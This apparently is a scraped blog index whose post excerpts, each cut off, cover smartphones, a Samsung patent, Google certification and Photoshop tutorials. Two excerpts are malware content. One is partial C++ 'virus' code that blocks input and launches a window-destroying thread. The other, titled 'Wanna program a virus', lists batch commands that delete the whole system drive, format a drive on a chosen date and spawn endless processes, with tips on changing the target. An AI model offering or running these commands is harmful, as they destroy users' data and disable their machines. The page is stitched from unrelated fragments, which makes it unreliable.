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THE RED SMART PHONE In 2017, the cinema camera making company RED announced it was working a  smartphone with a "holographic screen."  Consumers were unsure what this meant until September 2017. Essentially, the phone would provide a 3D viewing experience on screen, projecting things like buildings and landscapes in an interactive map. A user could essentially take a virtual tour via the phone screen, looking around, above, behind, or in-between various objects.  The RED smart phone is currently available for pre-order, for the fairly hefty price tag of $1,195. No official release date has been announced, but the company says users can expect to see the product sometime in 2018.  SMART GLASSES Smart glasses are far from a new invention. The glasses, which project information onto your retina as you go about your day, once came with clunky equipment attached. Cameras, extra appendages, and microphones made the glasses a bit of an eyesore that easily led to u

Samsung's New Technology

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New Samsung Patent Shows a Fully Curved Galaxy Smartphone In 2013, Samsung released its first smartphone with a flexible AMOLED display: The  Galaxy Round . A year later, the  Galaxy Note Edge  hit the market with a curved display. The Galaxy Round and the Note Edge had limited availability, and it took 2015’s  Galaxy S6 Edge  to make curved displays really popular. It’s telling that Samsung doesn’t sell a mainstream flagship smartphone with a flat display anymore. And if a new patent is any indication, it’s not stopping at displays — its next phone might fold around itself. Following on the heels of Samsung’s patent for a foldable phone user interface ,  LetsGoDigital  found a series of new patents in the WIPO (World International Property Office) database for a device with a curved display on both sides. It doesn’t merely have a curved-edge display — instead, the proposed smartphone has a 180-degree curved display that curves all the way to the rear. In the patent, Samsung sa

Virus in C++

Use iostream.h,conio.h,ctime.h, windows.h,winable.h int random, Freq, Dura, X, Y;//Integers are declared HWND mywindow, TaskMgr, CMD, Regedit; //This is used to catch-up memory charNotepad[MAX_PATH]="notepad.exe";//character is declared to open notepad char MineSweeper[MAX_PATH]="winmine.exe";//character is declared to open winrar file char Website[MAX_PATH]="http:\\www.google.com";//character is declared to open the website void SetUp(); void Run( int ID ); void Beeper(), OpenStuff(), Hibernation(), CrazyMouse(); //Function are declared DWORD WINAPI DestroyWindows(LPVOID); int main() { srand( time(0) ); random = rand()%6; system("title :.Virus.:"); BlockInput( true ); SetUp(); BlockInput( false ); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1) { Run( random ); Sleep(10); } }//Main function void SetUp() { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL);

Samsung galaxy S8

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The Samsung Galaxy S8, with its smooth features, is stylish enough to make jaws drop. But don’t let the pretty face fool you. Underneath the stylish exterior lies a beast, ready to charge at a moment’s notice. Stunning Infinity Display The end-to-end Infinity Display of the Galaxy S8 enables an expanded screen size without the need for a larger phone. Since there’s no bezel, all you see is pure content on the 14.65 cm (5.8) screen. With an 18.5:9 display ratio, every detail will fit perfectly on the Quad HD+ screen, making your viewing experience more immersive than ever. If Looks Could Kill The screen of this smartphone flows seamlessly over the edges to merge beautifully with the aluminium chassis, offering the phone a sleek look all around. The smooth, curved surface, sans bumps or angles, helps you easily hold onto your phone with one hand while you’re on-the-go. The home button is placed on the screen itself, and it stays inconspicuous until you ne

1600 Amphitheatre

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Google launches new certification program for mobile site developers Google is launching a new  certification program  for mobile site developers today. The exam covers everything from the basics of why mobile sites matter to how to improve mobile site speed, effective mobile UX design and more advanced topics like progressive web apps. As Google notes, passing the exam is meant to show that you have “a demonstrated ability to build and optimize high-quality sites, and allows you to promote yourself as a Google accredited mobile site developer.” A lot of the content in the  study guide  focuses on site speed. As Google notes, the majority of mobile site visitors will leave a site if it takes more than three seconds to load, yet the average load time for a mobile landing page is 22 seconds (and if those users leave without ever fully loading the site, they aren’t likely to click on any Google ads either, of course). It’s worth noting that the exam doesn’t focus on

Wanna program a virus?????????? Just code it...

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Delete All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Disable Internet Permanently ipconfig/release The Most Simple Virus To Crush The Window @Echo off Del C:\ *.* |y Endless Notepads @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Bomb Virus Copy Paste The Following If %date% NEQ 2009/11/25 goto exit format E: /y >nul :exit exit Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day Crazy caps lock *This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Endless Enter *This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wsh
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Photoshop is the tool of choice for most professional designers. There may be other powerful editors that offer similar functionality, but none one of them even comes close to the popularity, or have such a massive and passionate community, that Photoshop enjoys and deserves. It is within the Photoshop community where the application’s real power lies. Without the constant stream of freely available tutorials and resources from creatives designers, photographers, and well-versed, creative authors, learning new skills and techniques would be tough. In this collection of 100 Photoshop Tutorials we have split all of the techniques into the following categories for easier navigation:  Painting & Illustrating ,  Photo Composition ,  Drawing ,  Photo Manipulation ,  3D ,  Icon Design ,  Text Effects  and  Poster Design . There really is nothing better than rolling up your sleeves and delving into a new Photoshop tutorial and learning something new.  Enjoy! Painting & Illustra